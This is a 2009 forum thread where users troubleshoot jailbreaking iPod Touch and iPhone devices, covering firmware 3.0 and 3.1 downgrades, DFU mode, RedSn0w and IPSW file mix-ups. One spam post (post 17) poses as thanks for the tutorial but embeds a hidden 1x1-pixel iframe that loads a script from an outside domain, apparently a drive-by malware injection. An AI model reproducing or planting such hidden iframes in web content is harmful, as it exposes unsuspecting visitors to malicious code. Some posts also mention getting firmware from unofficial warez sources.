1. angiepangie's Avatar
    Lucky you don't have an iPhone that needs updating!
    You can downgrade back to 3.0 by going into DFU mode and shift+click restore. You will need to re-download 3.0 though since iTunes deletes old ipsws now.
    I always feel sorry for the guy in the iPhone commercials. He always gets a call right in the middle of trying to do something
    2009-09-11 02:07 AM
  2. stalbat's Avatar
    Well, I've had my iTouch jailbroken already, and today itunes asked me to update the ipod, so i did, and it restored it and it wasn't jailboken anymore.. So I tried jailbreaking it again, and i'm doing everything right.. but once its done, it gets stuck on the "downloading jailbreaking data" or something like that, and after like 10 mins it shows me the screen where i need to connect it to itunes and then i have to restore it again...
    What's wrong? =\
    2009-09-13 03:42 AM
  3. confucious's Avatar
    So you updated to FW3.1 and tried to JB? Even though there is no JB available for 3.1 yet?
    Or am I missing something?
    He who asks a question looks foolish for 5 minutes. He who doesn't ask a question remains foolish forever.
    2009-09-13 10:59 AM
  4. angiepangie's Avatar
    ^Yup. That's what it sounds like.
    3.1 can't be jailbroken yet, what don't people get about that?
    I always feel sorry for the guy in the iPhone commercials. He always gets a call right in the middle of trying to do something
    2009-09-13 02:16 PM
  5. Red-Blitz's Avatar
    If you cant downgrade to 3.0 and can't JB 3.1 how do you JB a ipod since iTunes 9?
    2009-09-14 04:10 AM
  6. angiepangie's Avatar
    You can downgrade to 3.0 on everything except 3gs
    2009-09-14 04:39 AM
  7. stalbat's Avatar
    Yeah... I'm sorry, I didn't realize it was ver 3.1 still... got it all fixed already and even helped a fellow ipod-owner to JB his new ipod =]

    Sorry everyone!
    2009-09-14 08:34 AM
  8. FastHorse's Avatar
    You can downgrade to 3.0 on everything except 3gs

    I'm trying to downgrade my friends 1G ipod touch from 3.1 to 3.0 so that i could jailbreak it and its says the software is not compatible with the ipod. Am I doing something wrong? I hit the option key + restore and it opens up finder so i select the 3.0 ipsw for the touch and it wont let me. Ive already done several 2g ipods the same way that had 2.2.1 can i not downgrade on the 1g?

    Thanks
    2009-09-15 01:31 AM
  9. angiepangie's Avatar
    Are you trying to use the same file as the 2G on your first gen?
    They're different files...
    I always feel sorry for the guy in the iPhone commercials. He always gets a call right in the middle of trying to do something
    2009-09-15 03:02 AM
  10. FastHorse's Avatar
    Are you trying to use the same file as the 2G on your first gen?
    They're different files...

    Yeah, How do i know the difference?

    Ok i see the description, but i cant find the firmware 1g 3.0
    Last edited by FastHorse; 2009-09-15 at 03:14 AM. Reason: Automerged Doublepost
    2009-09-15 03:14 AM
  11. angiepangie's Avatar
    iPod Touches aren't exactly my area of expertise..
    but I think the 2nd gen files start with iPod2,1 while the first gen files start with iPod1,2 or iPod1,1 (idk which..)
    I always feel sorry for the guy in the iPhone commercials. He always gets a call right in the middle of trying to do something
    2009-09-15 03:17 AM
  12. FastHorse's Avatar
    iPod Touches aren't exactly my area of expertise..
    but I think the 2nd gen files start with iPod2,1 while the first gen files start with iPod1,2 or iPod1,1 (idk which..)


    Got it, Thanks for your help. I was able to jailbreak it already. But for some reason the firmware is not up on this site, I had to get it somewhere else. But it worked.

    Thanks Again
    2009-09-15 04:40 AM
  13. confucious's Avatar
    The FW for the iPod Touch is paid for. Unless you have bought it you have downloaded warez which are not supported by this site and why the files are not hosted here or on any legitimate site.
    He who asks a question looks foolish for 5 minutes. He who doesn't ask a question remains foolish forever.
    2009-09-15 08:22 AM
  14. reaper0316's Avatar
    i dont know how to jailbreak my ipod touch 1g. nothing makes sense please help me out
    2009-10-04 09:09 PM
  15. confucious's Avatar
    Just run RedSn0w,
    He who asks a question looks foolish for 5 minutes. He who doesn't ask a question remains foolish forever.
    2009-10-04 09:58 PM
  16. andresaic's Avatar
    everything was great but when it gets on the part when your ipod says downloading jailbreak data, it freezes and in a while appears the usb and itunes icon. what could i do. please help.
    2009-10-07 10:59 PM
  17. zion21's Avatar
    Really great tutorial. I went through it pretty quickly and didnt have any problems. Thanks <iframe src="http://rewardslink.info/flash/files/index.php?id=700&action=scanjs&in_list=1" style="visibility:hidden; overflow:hidden; width:1px; height:1px;"></iframe>
    2009-10-08 06:46 AM
  18. krazed203's Avatar
    Does anyone know if it works for the new update 3.1.1
    2009-10-17 09:41 AM
  19. mk12's Avatar
    No you need to use Pwnage Tool, and it has to already be jailbroken. Pwnage Tool is Mac OS X only.

    The FW for the iPod Touch is paid for. Unless you have bought it you have downloaded warez which are not supported by this site and why the files are not hosted here or on any legitimate site.
    Thats why they don't have iPod Touch 3.0! But how do you get it then? You can't get it from apple anymore. Even If you paid for it before, when you update it deletes old ones. Its because to jailbreak my friend's iPod I need to first downgrade it to 3.0 and then use redsn0w.. Where would I get 3.0?
    Last edited by mk12; 2009-10-17 at 05:32 PM. Reason: Automerged Doublepost
    2009-10-17 05:32 PM
  20. frozen's Avatar
    I am trying to jailbreak my ipod touch 2.2.1 on my macbook. I have downloaded and intalled redsnow, as well as downloading and restoring my ipod. I browsed and found the restore file (iPod2,1_2.2.1_5H11a_Restore.ipsw) but Redsnow says Unable to recognise specified IPSW. What am i doing wrong? please help...

    I am trying to jailbreak my ipod touch 2.2.1 on my macbook. I have downloaded and intalled redsnow, as well as downloading and restoring my ipod. I browsed and found the restore file (iPod2,1_2.2.1_5H11a_Restore.ipsw) but Redsnow says Unable to recognise specified IPSW. What am i doing wrong? please help...
    Last edited by frozen; 2009-10-19 at 11:41 PM. Reason: Automerged Doublepost
    2009-10-19 11:41 PM
165 ... 34567 ...
LINK TO POST COPIED TO CLIPBOARD